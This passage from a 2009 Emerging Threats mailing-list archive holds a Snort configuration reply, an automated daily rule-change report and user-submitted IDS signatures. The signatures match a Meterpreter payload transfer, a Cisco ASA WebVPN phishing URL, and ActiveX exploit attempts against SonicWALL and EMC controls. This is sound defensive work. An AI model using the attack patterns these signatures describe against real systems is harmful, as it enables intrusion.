>>>> use_static_footprint_sizes IS enabled.  But why?
>>>>
>>>> --Guise
>>>    This is an oversight.  It is currently enabled in both the default
>>>    snort.conf provided in the official releases of Snort as well as the
>>>    VRT provided rulepacks.
>>>
>>>    An update to the VRT provided rulepacks will be released soon that
>>>    will correct this oversight.  The default snort.conf provided in the
>>>    official releases of Snort will be updated upon the next release of
>>>    Snort.
>>>
>>>
>>>    Brian
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> 
> 


From emerging at emergingthreats.net  Wed Dec  9 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Wed,  9 Dec 2009 16:00:12 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091209210012.A80734504D@goliath.jonkmans.com>


[***] Results from Oinkmaster started Wed Dec  9 16:00:12 2009 [***]

[+++]          Added rules:          [+++]

 2010454 - ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host (emerging-attack_response.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-attack_response.rules (1):
        #by Varga-Perke Balint

     -> Added to emerging-sid-msg.map (1):
        2010454 || ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host || url,doc.emergingthreats.net/2009581

     -> Added to emerging-sid-msg.map.txt (1):
        2010454 || ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host || url,doc.emergingthreats.net/2009581

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (88):
        2500470 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500471 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500472 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500473 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500474 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500475 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500476 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500477 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500478 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (240) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500479 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (240) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500480 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (241) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500481 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (241) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500482 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (242) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500483 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (242) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500484 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (243) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500485 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (243) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500486 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (244) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500487 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (244) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500488 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (245) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500489 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (245) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500490 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (246) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500491 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (246) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500492 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (247) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500493 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (247) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500494 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (248) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500495 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (248) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500496 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (249) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500497 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (249) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500498 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (250) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500499 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (250) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500500 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (251) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500501 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (251) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500502 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (252) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500503 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (252) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500504 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (253) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500505 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (253) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500506 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500507 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500508 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500509 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500510 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500511 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500512 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500513 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510470 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510471 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510472 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510473 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510474 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510475 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510476 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510477 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510478 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (240) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510479 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (240) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510480 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (241) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510481 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (241) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510482 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (242) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510483 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (242) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510484 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (243) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510485 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (243) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510486 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (244) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510487 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (244) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510488 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (245) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510489 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (245) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510490 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (246) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510491 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (246) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510492 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (247) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510493 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (247) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510494 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (248) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510495 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (248) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510496 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (249) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510497 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (249) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510498 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (250) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510499 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (250) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510500 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (251) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510501 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (251) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510502 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (252) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510503 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (252) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510504 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (253) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510505 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (253) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510506 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510507 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510508 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510509 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510510 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510511 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510512 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510513 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (88):
        2500470 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500471 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500472 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500473 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500474 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500475 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500476 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500477 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500478 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (240) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500479 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (240) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500480 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (241) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500481 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (241) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500482 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (242) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500483 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (242) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500484 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (243) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500485 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (243) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500486 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (244) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500487 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (244) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500488 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (245) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500489 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (245) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500490 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (246) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500491 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (246) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500492 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (247) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500493 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (247) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500494 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (248) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500495 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (248) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500496 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (249) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500497 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (249) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500498 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (250) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500499 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (250) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500500 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (251) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500501 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (251) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500502 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (252) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500503 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (252) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500504 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (253) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500505 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (253) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500506 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500507 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500508 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500509 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500510 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500511 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500512 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500513 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510470 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510471 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (236) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510472 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510473 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (237) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510474 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510475 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (238) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510476 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510477 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (239) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510478 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (240) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510479 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (240) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510480 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (241) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510481 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (241) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510482 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (242) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510483 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (242) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510484 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (243) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510485 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (243) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510486 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (244) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510487 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (244) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510488 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (245) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510489 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (245) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510490 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (246) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510491 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (246) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510492 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (247) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510493 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (247) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510494 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (248) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510495 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (248) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510496 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (249) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510497 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (249) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510498 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (250) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510499 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (250) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510500 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (251) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510501 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (251) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510502 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (252) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510503 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (252) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510504 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (253) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510505 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (253) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510506 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510507 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510508 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510509 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510510 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510511 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510512 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510513 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts


From kevross33 at googlemail.com  Thu Dec 10 09:45:28 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Thu, 10 Dec 2009 14:45:28 +0000
Subject: [Emerging-Sigs] sigs
Message-ID: <e75cc74a0912100645s5036265an94cdcc7fccbfe3ab@mail.gmail.com>

2 new sigs and a couple of changes. Kev

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Possible Cisco
Adaptive Security Appliance Web VPN FTP or CIFS Authentication Form Phishing
Attempt"; flow:established,to_server; uricontent:"|2B|CSCOE|2B
2F|files|2F|browse|2E|html"; nocase; uricontent:"code|3D|init"; nocase;
uricontent:"path|3D|ftp"; nocase; classtype:attempted-user; reference:url,
www.securityfocus.com/bid/35475/info; reference:cve,2009-1203; sid:11000001;
rev:1;)

# (I Thought this one might still be possible to all those devices which go
out and aren't updated, happens all the time with Cisco anyway).
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT
ACTIVEX SonicWALL SSL VPN Client Remote ActiveX AddRouteEntry Attempt";
flow:to_client,established; content:"clsid"; nocase;
content:"6EEFD7B1-B26C-440D-B55A-1EC677189F30"; nocase; distance:0;
content:"AddRouteEntry"; nocase;
pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*6EEFD7B1-B26C-440D-B55A-1EC677189F30/si";
classtype:attempted-user; reference:url,www.securityfocus.com/bid/26288/info;
reference:cve,2007-5603; sid:11000002; rev:1;)

# SUPERFICIAL CHANGES: Additional Reference & addition of EMC to identify
product, changed flow to to_client rather than from_server, revision count
incremented
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT
ACTIVEX Possible EMC Captiva QuickScan Pro KeyWorks KeyHelp Module
keyhelp.ocx ActiveX Control Remote Buffer Overflow Attempt";
flow:to_client,established; content:"clsid"; nocase;
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; nocase; distance:0;
content:"KEYHELP"; nocase;
pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*B7ECFD41-BE62-11D2-B9A8-00104B138C8C/si";
classtype:attempted-user; reference:url,www.securityfocus.com/bid/36546/info;
